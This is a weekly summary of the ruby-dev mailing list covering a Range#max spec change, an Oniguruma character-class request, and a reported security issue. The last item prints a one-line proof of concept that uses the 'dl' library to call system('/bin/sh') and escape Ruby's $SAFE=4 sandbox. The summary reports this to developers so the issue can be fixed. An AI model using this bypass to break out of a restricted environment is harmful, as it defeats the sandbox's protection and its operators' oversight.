Hello all,

This is a summary for last week on the ruby-dev mailing list.


  [ruby-dev:19837] [BUG] (0...3).max/ruby-1.8.0 preview2

Shin-ichiro HARA pointed out that (0...3).max is 3 in
ruby-1.8.0 preview2. Matz replied it's not a bug, but
change of spec. Shin Nishiyama commented it troublesome
that 0...3 have two interpretation, a discrete set of
{0,1,2,3} or a countinous interval {x| 0<x<3}. Matz
agreed, but he said he could not be helped.


  [ruby-dev:19828] Re: [Oniguruma] Version 1.8.4

Tanaka Akira requested for Oniguruma to support Java's class
set operation.

  http://java.sun.com/j2se/1.4/docs/api/java/util/regex/Pattern.html

But '[' in character class conflicts with raw character '['.
So Tanaka added a request that raw character '[', ']' and '-'
in character class must be escaped by '\'. 


  [ruby-dev:19865] dl in $SAFE=4

Minero Aoki noticed that any user can execute arbitrary command
with an external library 'dl' regardless of $SAFE(safe level).

  require 'dl'
  $SAFE = 4
  DL.dlopen('libc.so.6').sym('system', 'IS').call("/bin/sh")
   #=> execute shell

It may be a vulnerability issue and this behavior will be
changed in the near future.


Regards,

TAKAHASHI 'Maki' Masayoshi     E-mail: maki / rubycolor.org